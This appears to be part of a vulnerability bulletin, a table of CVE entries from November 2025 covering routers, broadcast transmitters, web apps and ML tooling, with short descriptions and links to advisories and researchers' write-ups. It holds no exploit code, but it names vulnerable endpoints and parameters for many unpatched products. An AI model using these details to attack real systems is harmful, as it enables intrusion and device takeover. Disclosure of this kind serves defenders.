| mindersec--minder | Minder is an open source software supply chain security platform. In Minder Helm version 0.20241106.3386+ref.2507dbf and Minder Go versions from 0.0.72 to 0.0.83, Minder users may fetch content in the context of the Minder server, which may include URLs which the user would not normally have access to. This issue has been patched in Minder Helm version 0.20250203.3849+ref.fdc94f0 and Minder Go version 0.0.84. | 2025-11-21 | not yet calculated | CVE-2025-65109 | https://github.com/mindersec/minder/security/advisories/GHSA-6xvf-4vh9-mw47 https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8   |
| ml-explore--mlx | MLX is an array framework for machine learning on Apple silicon. Prior to version 0.29.4, there is a heap buffer overflow in mlx::core::load() when parsing malicious NumPy .npy files. An attacker-controlled file causes a 13-byte out-of-bounds read, leading to a crash or information disclosure. This issue has been patched in version 0.29.4. | 2025-11-21 | not yet calculated | CVE-2025-62608 | https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6 https://github.com/ml-explore/mlx/pull/1 https://github.com/ml-explore/mlx/pull/2   |
| ml-explore--mlx | MLX is an array framework for machine learning on Apple silicon. Prior to version 0.29.4, there is a segmentation fault in mlx::core::load_gguf() when loading malicious GGUF files. An untrusted pointer from the external gguflib library is dereferenced without validation, causing an application crash. This issue has been patched in version 0.29.4. | 2025-11-21 | not yet calculated | CVE-2025-62609 | https://github.com/ml-explore/mlx/security/advisories/GHSA-j842-xgm4-wf88   |
| n/a--Ascertia SigningHub through 8.6.8 | In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests. | 2025-11-18 | not yet calculated | CVE-2025-54320 | https://www.ascertia.com/company/vulnerability-disclosure-policy/ https://github.com/saykino/CVE-2025-54320   |
| n/a--Ascertia SigningHub through 8.6.8 | In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the reset password function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating reset password requests. | 2025-11-18 | not yet calculated | CVE-2025-54321 | https://www.ascertia.com/company/vulnerability-disclosure-policy/ https://github.com/saykino/CVE-2025-54321   |
| n/a--Awesome Miner thru 11.2.4 | A vulnerability was discovered in Awesome Miner thru 11.2.4 that allows arbitrary read and write to kernel memory and MSRs (such as LSTAR) as an unprivileged user. This is due to the implementation of an insecure version of WinRing0 (1.2.0.5, renamed to IntelliBreeze.Maintenance.Service.sys) that lacks a properly secured DACL, allowing unprivileged users to interact with the driver and, as a result, the kernel. This can result in local privilege escalation, information disclosure, denial of service, and other unspecified impacts. | 2025-11-18 | not yet calculated | CVE-2025-63602 | https://www.awesomeminer.com/download https://dreadsec.co/p/cve-2025-63602-hijacking-system-calls-with-a-popular-crypto-miner.html   |
| n/a--Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) | The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63221 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63221_Axel%20Technology%20puma%20-%20Broken%20Access%20Control   |
| n/a--Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) | The Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63223 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63223_Axel%20Technology%20StreamerMAX%20MK%20II%20-%20Broken%20Access%20Control   |
| n/a--Axel Technology WOLF1MS and WOLF2MS devices | The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63218 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control   |
| n/a--Backdrop CMS 1.32.1 | Host Header Injection vulnerability in Backdrop CMS 1.32.1 allows attackers to manipulate the Host header in password reset requests, leading to redirects to malicious domains and potential session hijacking via cookie injection. | 2025-11-18 | not yet calculated | CVE-2025-63828 | https://github.com/mertdurum06/BackdropCms-1.32.1/ https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt   |
| n/a--bridgetech | An issue was discovered in bridgetech probes VB220 IP Network Probe, VB120 Embedded IP + RF Probe, VB330 High-Capacity Probe, VB440 ST 2110 Production Analytics Probe, and NOMAD, firmware versions 6.5.0-9, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63205 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63205_bridgetech%20probes%20Information%20Disclosure   |
| n/a--bridgetech VB288 | An issue was discovered in bridgetech VB288 Objective QoE Content Extractor, firmware version 5.6.0-8, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63208 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63208_bridgetech%20VB288%20Information%20Disclosure   |
| n/a--bridgetech VBC Server & Element Manager | Stored cross-site scripting vulnerability in bridgetech VBC Server & Element Manager, firmware versions 6.5.0-9 thru 6.5.0-10, allows attackers to execute arbitrary code via the addName parameter to the /vbc/core/userSetupDoc/userSetupDoc endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63211 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63211_bridgetech%20VBC%20Server%20and%20Element%20Manager%20Stored%20%20xss   |
| n/a--bridgetech VBC Server & Element Manager | An issue was discovered in bridgetech VBC Server & Element Manager, firmware versions 6.5.0-9 and 6.5.0-10, allowing unauthorized attackers to delete and create arbitrary accounts. | 2025-11-19 | not yet calculated | CVE-2025-63214 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63214_bridgetech%20VBC%20Server%20and%20Element%20Manager%20Broken%20Access%20Control   |
| n/a--Campcodes Online Hospital Management System 1.0 | Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection in /admin/index.php via the parameter username. | 2025-11-19 | not yet calculated | CVE-2025-63719 | https://github.com/Pei4AN/CVE/issues/6   |
| n/a--Clerk-js 5.88.0 | An issue was discovered in Clerk-js 5.88.0 allowing attackers to bypass the OAuth authentication flow by manipulating the request at the OTP verification stage. | 2025-11-20 | not yet calculated | CVE-2025-63700 | https://clerk.com https://github.com/itsnishat08/CVE-2025-63700   |
| n/a--couch-auth 0.21.2 | Session tokens and passwords in couch-auth 0.21.2 are stored in JavaScript objects and remain in memory without explicit clearing in src/user.ts lines 700-707. This creates a window of opportunity for sensitive data extraction through memory dumps, debugging tools, or other memory access techniques, potentially leading to session hijacking. | 2025-11-20 | not yet calculated | CVE-2025-60794 | https://www.npmjs.com/package/@perfood/couch-auth https://github.com/perfood/couch-auth https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60794.md   |
| n/a--D-Link Router DIR-868L | D-Link Router DIR-868L A1 FW106KRb01.bin has an unauthenticated remote code execution vulnerability in the cgibin binary. The HNAP service provided by cgibin does not filter the HTTP SOAPAction header field. An unauthenticated remote attacker can execute shell commands. | 2025-11-19 | not yet calculated | CVE-2025-63932 | https://www.dlink.com/en/security-bulletin/ https://github.com/WhereisRain/DIR-868/tree/main https://github.com/WhereisRain/DIR-868   |
| n/a--Dasan Switch DS2924 | An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser. | 2025-11-19 | not yet calculated | CVE-2025-63206 | http://dasansmc.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass   |
| n/a--DzzOffice 2.3.x | The comment editing template (dzz/comment/template/edit_form.htm) in DzzOffice 2.3.x lacks adequate security escaping for user-controllable data in multiple contexts, including HTML and JavaScript strings. This allows low-privilege attackers to construct comment content or request parameters and execute arbitrary JavaScript code when the victim opens the editing pop-up. | 2025-11-18 | not yet calculated | CVE-2025-63693 | https://github.com/Yohane-Mashiro/dzzoffice_xss https://github.com/zyx0814/dzzoffice/issues/363   |
| n/a--DzzOffice v2.3.7 | DzzOffice v2.3.7 and before is vulnerable to SQL Injection in explorer/groupmanage. | 2025-11-18 | not yet calculated | CVE-2025-63694 | https://github.com/zyx0814/dzzoffice/issues/364 https://github.com/Yohane-Mashiro/dzzoffice_sql   |
| n/a--DzzOffice v2.3.7 | DzzOffice v2.3.7 and before is vulnerable to Arbitrary File Upload in /dzz/system/ueditor/php/controller.php. | 2025-11-18 | not yet calculated | CVE-2025-63695 | https://github.com/zyx0814/dzzoffice/issues/365 https://github.com/Yohane-Mashiro/dzzoffice_upload   |
| n/a--E-commerce Project v1.0 | A reflected cross-site scripting (XSS) vulnerability in the /ecommerce/products.php component of E-commerce Project v1.0 and earlier allows attackers to execute arbitrary JavaScript in the context of a user's browser by injecting a crafted payload into the id parameter. | 2025-11-19 | not yet calculated | CVE-2025-63879 | https://www.linkedin.com/in/rumana-khatun-208aa731b/ https://github.com/rumanaemu/CVE-Research/blob/main/CVE-2025-63879.md |
| n/a--ELCA Star Transmitter | The ELCA Star Transmitter Remote Control firmware 1.25 for STAR150, BP1000, STAR300, STAR2000, STAR1000, STAR500, and possibly other models, contains an information disclosure vulnerability allowing unauthenticated attackers to retrieve admin credentials and system settings via an unprotected /setup.xml endpoint. The admin password is stored in plaintext under the <p05> XML tag, potentially leading to remote compromise of the transmitter system. | 2025-11-19 | not yet calculated | CVE-2025-63209 | https://www.elcaradio.com https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63209_ELCA%20Star%20Transmitter%20Remote%20Control%20-%20Information%20Disclosure   |
| n/a--electic-shop v1.0 | A DOM-based cross-site scripting vulnerability exists in electic-shop v1.0 (Bhabishya-123/E-commerce). The site's client-side JavaScript reads attacker-controlled input (for example, values derived from the URL or page fragment) and inserts it into the DOM via unsafe sinks (innerHTML/insertAdjacentHTML/document.write) without proper sanitization or context-aware encoding. An attacker can craft a malicious URL that, when opened by a victim, causes arbitrary JavaScript to execute in the victim's browser under the electic-shop origin. | 2025-11-18 | not yet calculated | CVE-2025-63883 | https://github.com/minhajultaivin/security-advisories/blob/main/CVE-2025-63883.md   |
| n/a--eProsima Fast-DDS v3.3 | eProsima Fast-DDS v3.3 and before has an infinite loop vulnerability caused by integer overflow in the Time_t::fraction() function. | 2025-11-18 | not yet calculated | CVE-2025-63829 | https://github.com/eProsima/Fast-DDS/blob/master/src/cpp/fastdds/core/Time_t.cpp#L67 https://gist.github.com/lkloliver/b00377bec754d4aa1dc731be210d5889 |
| n/a--Eurolab ELTS100_UBX device (firmware version ELTS100v1.UBX) | The Eurolab ELTS100_UBX device (firmware version ELTS100v1.UBX) is vulnerable to Broken Access Control due to missing authentication on critical administrative endpoints. Attackers can directly access and modify sensitive system and network configurations, upload firmware, and execute unauthorized actions without any form of authentication. This vulnerability allows remote attackers to fully compromise the device, control its functionality, and disrupt its operation. | 2025-11-18 | not yet calculated | CVE-2025-63225 | http://eurolab-srl.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63225_Eurolab_ELTS100_UBX_Broken_Access_Control   |
| n/a--FileCodeBox v2.2 | A path traversal vulnerability found in FileCodeBox v2.2 and earlier allows arbitrary file writes when the application is configured to use local filesystem storage. The SystemFileStorage.save_file method in core/storage.py uses filenames from user input without validation to construct save_path and save files. This allows remote attackers to write arbitrary files outside the intended directory by sending crafted POST requests containing traversal sequences to the /share/file/ upload endpoint, which does not require any authorization. | 2025-11-19 | not yet calculated | CVE-2025-51661 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/349 |
| n/a--FileCodeBox version 2.2 and earlier | A stored cross-site scripting (XSS) vulnerability is found in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text "codeboxes". The XSS payload is automatically executed in the browser of any user who accesses the infected codebox by clicking a link or entering the share code. | 2025-11-19 | not yet calculated | CVE-2025-51662 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/351 |
| n/a--FileCodeBox version 2.2 and earlier | A vulnerability found in the IPRateLimit implementation of FileCodeBox up to 2.2 allows remote attackers to bypass IP-based rate limit protection and failed-attempt restrictions by spoofing the X-Real-IP and X-Forwarded-For HTTP headers. This can enable attackers to perform DoS attacks or brute force share codes. | 2025-11-19 | not yet calculated | CVE-2025-51663 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/350 |
| n/a--Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1-r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) | Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1-r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) were discovered to expose subscribers' IMSI identifiers in plaintext during the initial phase of EAP-SIM authentication over the `FreeWifi_secure` network. During the EAP-Response/Identity exchange, the subscriber's full Network Access Identifier (NAI), which embeds the raw IMSI, is transmitted without encryption, tunneling, or pseudonymization. An attacker located within Wi-Fi range (~100 meters) can passively capture these frames without requiring user interaction or elevated privileges. The disclosed IMSI enables device tracking, subscriber correlation, and long-term monitoring of user presence near any broadcasting Freebox device. The vendor acknowledged the vulnerability, and the `FreeWifi_secure` service is planned for full deactivation by 1 October 2025. | 2025-11-17 | not yet calculated | CVE-2025-63292 | https://gist.github.com/7h30th3r0n3/1a0fadb19f1528e3d3f6bad9f680c3b0#file-cve-2025-63292-frebox-imsi-md https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/   |
| n/a--GatesAir Flexiva-LX devices on firmware 1.0.13 and 2.0, including models LX100, LX300, LX600, and LX1000 | GatesAir Flexiva-LX devices on firmware 1.0.13 and 2.0, including models LX100, LX300, LX600, and LX1000, expose sensitive session identifiers (sid) in the publicly accessible log file located at /log/Flexiva%20LX.log. An unauthenticated attacker can retrieve valid session IDs and hijack sessions without providing any credentials. This attack requires the legitimate user (admin) to have previously closed the browser window without logging out. | 2025-11-19 | not yet calculated | CVE-2025-63212 | https://www.gatesair.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63212%20_GatesAir%20Flexiva-LX%20Series%20_%20Session%20Hijacking   |
| n/a--Github Restaurant Website Restoran v1.0 | Github Restaurant Website Restoran v1.0 was discovered to contain a SQL injection vulnerability via the Contact Form page. | 2025-11-19 | not yet calculated | CVE-2025-63878 | https://www.linkedin.com/in/rumana-khatun-208aa731b/ https://github.com/rumanaemu/CVE-Research/blob/main/CVE-2025-63878.md   |
| n/a--H3C ERG3/ERG5 series routers and XiaoBei series routers, cloud gateways, and wireless access points (versions R0162P07, UAP700-WPT330-E2265, UAP672-WPT330-R2262, UAP662E-WPT330-R2262P03, WAP611-WPT330-R1348-OASIS, WAP662-WPT330-R2262, WAP662H-WPT330-R2262, USG300V2-WPT330-R2129, MSG300-WPT330-R1350, and MSG326-WPT330-R2129) | A remote command execution (RCE) vulnerability was discovered in all H3C ERG3/ERG5 series routers and XiaoBei series routers, cloud gateways, and wireless access points (versions R0162P07, UAP700-WPT330-E2265, UAP672-WPT330-R2262, UAP662E-WPT330-R2262P03, WAP611-WPT330-R1348-OASIS, WAP662-WPT330-R2262, WAP662H-WPT330-R2262, USG300V2-WPT330-R2129, MSG300-WPT330-R1350, and MSG326-WPT330-R2129). Attackers are able to exploit this vulnerability via injecting crafted commands into the sessionid parameter. | 2025-11-18 | not yet calculated | CVE-2025-63258 | http://h3c.com https://zhiliao.h3c.com/Theme/details/232571   |
| n/a--Ilevia EVE X1 Server Firmware | Cross Site Scripting vulnerability in Ilevia EVE X1 Server Firmware Version <= 4.7.18.0.eden and Logic Version <= 6.00 - 2025_07_21 allows a remote attacker to execute arbitrary code via the /index.php component. | 2025-11-20 | not yet calculated | CVE-2025-60737 | https://github.com/iSee857/ilevia-EVE-X1-Server-CSRF |
| n/a--Ilevia EVE X1 Server Firmware | An issue in Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before, and Logic Version v6.00 - 2025_07_21 and before, allows a remote attacker to execute arbitrary code via the ping.php component, which does not perform secure filtering on IP parameters. | 2025-11-20 | not yet calculated | CVE-2025-60738 | https://github.com/iSee857/ilevia-EVE-X1-Server |
| n/a--Institute-of-Current-Students v1.0 | Institute-of-Current-Students v1.0 contains a time-based blind SQL injection vulnerability in the mydetailsstudent.php endpoint. The `myds` GET parameter is not adequately sanitized before being used in SQL queries. | 2025-11-20 | not yet calculated | CVE-2025-52410 | https://github.com/mathurvishal/Institute-of-Current-Students---PHP-Project/issues/2   |
| n/a--Itel DAB Encoder (IDEnc build 25aec8d) | The Itel DAB Encoder (IDEnc build 25aec8d) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-19 | not yet calculated | CVE-2025-63224 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63224_Itel%20DAB%20Encoder%20Authentication%20Bypass   |
| n/a--Itel DAB Gateway (IDGat build c041640a) | The Itel DAB Gateway (IDGat build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-18 | not yet calculated | CVE-2025-63216 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63216_Itel%20DAB%20Gateway%20Authentication%20Bypass   |
| n/a--Itel DAB Gateway (IDGat build c041640a) | The Itel DAB MUX (IDMUX build c041640a) is vulnerable to Authentication Bypass due to improper JWT validation across devices. Attackers can reuse a valid JWT token obtained from one device to authenticate and gain administrative access to any other device running the same firmware, even if the passwords and networks are different. This allows full compromise of affected devices. | 2025-11-18 | not yet calculated | CVE-2025-63217 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63217%20_%20Itel%20DAB%20MUX%20Authentication%20Bypass   |
| n/a--ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) | The ITEL ISO FM SFN Adapter (firmware ISO2 2.0.0.0, WebServer 2.0) is vulnerable to session hijacking due to improper session management on the /home.html endpoint. An attacker can access an active session without authentication, allowing them to control the device, modify configurations, and compromise system integrity. | 2025-11-19 | not yet calculated | CVE-2025-63219 | https://www.itel.it/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63219_ITEL%20ISO%20FM%20SFN%20Adapter%20-%20Session%20Hijacking   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the recover_email parameter in user_password_recover.php. | 2025-11-17 | not yet calculated | CVE-2024-44651 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44651.md   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email, username, user_firstname, user_lastname, and user_address parameters in user_register.php. | 2025-11-17 | not yet calculated | CVE-2024-44652 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44652.md   |
| n/a--Kashipara Ecommerce Website 1.0 | Kashipara Ecommerce Website 1.0 is vulnerable to SQL Injection via the user_email parameter in user_login.php. | 2025-11-17 | not yet calculated | CVE-2024-44653 | https://www.kashipara.com/project/php/322/ecommerce-website-in-php-with-source-code-download https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44653.md   |
| n/a--kashipara School Management System 1.0 | kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the formuser and formpassword parameters in /adminLogin.php. | 2025-11-17 | not yet calculated | CVE-2024-46334 | https://www.kashipara.com/project/php/73/school-management-system-download-project-source-code-in-php https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46334.md   |
| n/a--kashipara School Management System 1.0 | kashipara School Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /client_user/feedback.php. | 2025-11-17 | not yet calculated | CVE-2024-46336 | https://www.kashipara.com/project/php/73/school-management-system-download-project-source-code-in-php https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46336.md   |
| n/a--kishan0725 Hospital Management System | kishan0725 Hospital Management System has a Cross-Site Scripting (XSS) vulnerability in appsearch.php via the email parameter. | 2025-11-18 | not yet calculated | CVE-2025-63514 | https://github.com/kishan0725/Hospital-Management-System/issues/54 https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_Stored_XSS.md   |
| n/a--kishan0725 Hospital Management System v4 | kishan0725 Hospital Management System v4 has an Insecure Direct Object Reference (IDOR) vulnerability in the appointment cancellation functionality. | 2025-11-18 | not yet calculated | CVE-2025-63513 | https://github.com/kishan0725/Hospital-Management-System/issues/55 https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_IDOR.md   |
| n/a--kishan0725 Hospital Management System v4 | kishan0725 Hospital Management System v4 is vulnerable to SQL Injection in admin-panel1.php, specifically in the doctor deletion logic. The application fails to properly sanitize or parameterize user-supplied input from the demail parameter before incorporating it directly into a dynamic SQL query. | 2025-11-18 | not yet calculated | CVE-2025-63512 | https://github.com/NicatAliyevh/Zero-Days/blob/main/Hospital_Management_System_SQL2.md |
| n/a--Kotaemon 0.11.0 | Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allows attackers to execute arbitrary code via a crafted PDF. | 2025-11-18 | not yet calculated | CVE-2025-56526 | https://github.com/Cinnamon/kotaemon/commit/37cdc28 https://github.com/Cinnamon/kotaemon https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363 https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73 |
| n/a--Kotaemon 0.11.0 | Plaintext password storage in Kotaemon 0.11.0 in the client's localStorage. | 2025-11-18 | not yet calculated | CVE-2025-56527 | https://github.com/Cinnamon/kotaemon/commit/37cdc28 https://github.com/Cinnamon/kotaemon https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363?pvs=74 https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73   |
| n/a--Local Agent DVR versions thru 6.6.1.0 | Local Agent DVR versions through 6.6.1.0 are vulnerable to directory traversal that allows an unauthenticated local attacker to gain access to sensitive information, cause a server-side request forgery (SSRF), or execute OS commands. | 2025-11-18 | not yet calculated | CVE-2025-63408 | https://www.ericholub.com/blog/agent-dvr-rce/ https://ispysoftware.github.io/Agent_API/ |
| n/a--MCP Data Science Server | A command injection vulnerability exists in the MCP Data Science Server's (reading-plus-ai/mcp-server-data-exploration) 0.1.6 in the safe_eval() function (src/mcp_server_ds/server.py:108). The function uses Python's exec() to execute user-supplied scripts but fails to restrict the __builtins__ dictionary in the globals parameter. When __builtins__ is not explicitly defined, Python automatically provides access to all built-in functions including __import__, exec, eval, and open. This allows an attacker to execute arbitrary Python code with full system privileges, leading to complete system compromise. The vulnerability can be exploited by submitting a malicious script to the run_script tool, requiring no authentication or special privileges. | 2025-11-18 | not yet calculated | CVE-2025-63603 | https://github.com/reading-plus-ai/mcp-server-data-exploration/issues/12   |
| n/a--mihomo v1.19.11 | Incorrect access control in mihomo v1.19.11 allows authenticated attackers with low-level privileges to read arbitrary files with elevated privileges via obtaining the external control key from the config file. | 2025-11-18 | not yet calculated | CVE-2025-56499 | https://github.com/MetaCubeX/mihomo/tree/v1.19.11 https://github.com/Cherrling/CVE-2025-56499   |
| n/a--Milos Paripovic OneCommander 3.102.0.0 | Milos Paripovic OneCommander 3.102.0.0 is vulnerable to Directory Traversal. The vulnerability resides in the ZIP file processing component, specifically in the functionality responsible for extracting and handling ZIP archive contents. | 2025-11-19 | not yet calculated | CVE-2025-63371 | https://www.onecommander.com/ https://jeroscope.com/advisories/2025/jero-2025-007/   |
| n/a--Modular Max Serve before 25.6 | Unsafe Deserialization vulnerability in Modular Max Serve before 25.6, specifically when the "--experimental-enable-kvcache-agent" feature is used, allows attackers to execute arbitrary code. | 2025-11-18 | not yet calculated | CVE-2025-60455 | https://github.com/modular/modular/issues/4795 https://github.com/modular/modular/blame/main/max/serve/kvcache_agent/kvcache_agent.py#L220 https://github.com/modular/modular/commit/10620059fb5c47fb0c30e5d21a8ff3b8d622fba4 https://github.com/modular/modular/commit/ee9c4ab02345dd30bed8b79771b6909ff1b930a1 https://github.com/modular/modular/commit/b20e749fa892dbe772e890a268002f732164d9f5 https://www.oligo.security/blog/shadowmq-how-code-reuse-spread-critical-vulnerabilities-across-the-ai-ecosystem |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287 contains an unrestricted file upload vulnerability in the /patch.php endpoint. An attacker with administrative credentials can upload arbitrary files (e.g., PHP webshells), which are stored in the /patch/ directory. This allows the attacker to execute arbitrary commands on the server, potentially leading to full system compromise. | 2025-11-18 | not yet calculated | CVE-2025-63227 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63227_Mozart_FM_Transmitter_authenticated_File_Upload |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287 contains an unauthenticated file upload vulnerability in the /upload_file.php endpoint. An attacker can exploit this by sending a crafted POST request with a malicious file (e.g., a PHP webshell) to the server. The uploaded file is stored in the /upload/ directory, enabling remote code execution and full system compromise. | 2025-11-18 | not yet calculated | CVE-2025-63228 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63228_Mozart_FM_Transmitter_Unauthenticated_File_Upload |
| n/a--Mozart FM Transmitter version WEBMOZZI-00287 | The Mozart FM Transmitter web management interface on version WEBMOZZI-00287 contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. By injecting a malicious JavaScript payload into the ?m= query parameter, an attacker can execute arbitrary code in the victim's browser, potentially stealing sensitive information, hijacking sessions, or performing unauthorized actions. | 2025-11-18 | not yet calculated | CVE-2025-63229 | https://www.dbbroadcast.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63229_Mozart_FM_Transmitter_xss |
| n/a--MyScreenTools v2.2.1.0 | MyScreenTools v2.2.1.0 contains a critical OS command injection vulnerability in the GIF compression tool. The application fails to properly sanitize user-supplied file paths before passing them to cmd.exe, allowing attackers to execute arbitrary system commands with the privileges of the user running the application. The vulnerability exists in the CMD() function within GIFSicleTool\Form_gif_sicle_tool.cs, which constructs shell commands by concatenating unsanitized user input (file paths) and executes them via cmd.exe. | 2025-11-17 | not yet calculated | CVE-2025-63916 | https://github.com/luotengyuan/MyScreenTools/blob/master/GIFSicleTool/Form_gif_sicle_tool.cs https://github.com/luotengyuan/MyScreenTools/tree/master https://github.com/cydtseng/Vulnerability-Research/blob/main/myscreentools/OSCommandInjection-GifCompression.md   |
| n/a--FS[.]com | FS Inc S3150-8T2F 8-Port Gigabit Ethernet L2+ Switch, 8 x Gigabit RJ45, with 2 x 1Gb SFP, Fanless. All versions before 2.2.0D Build 135103 were discovered to transmit cookies for their web based administrative application containing usernames and passwords. These were transmitted in cleartext using simple base64 encoding during every POST request made to the server. | 2025-11-20 | not yet calculated | CVE-2025-25613 | http://fs.com http://s3150-8t2f.com https://github.com/SwiftSecur/S3150-8T2F-FS.com-Research/wiki   |
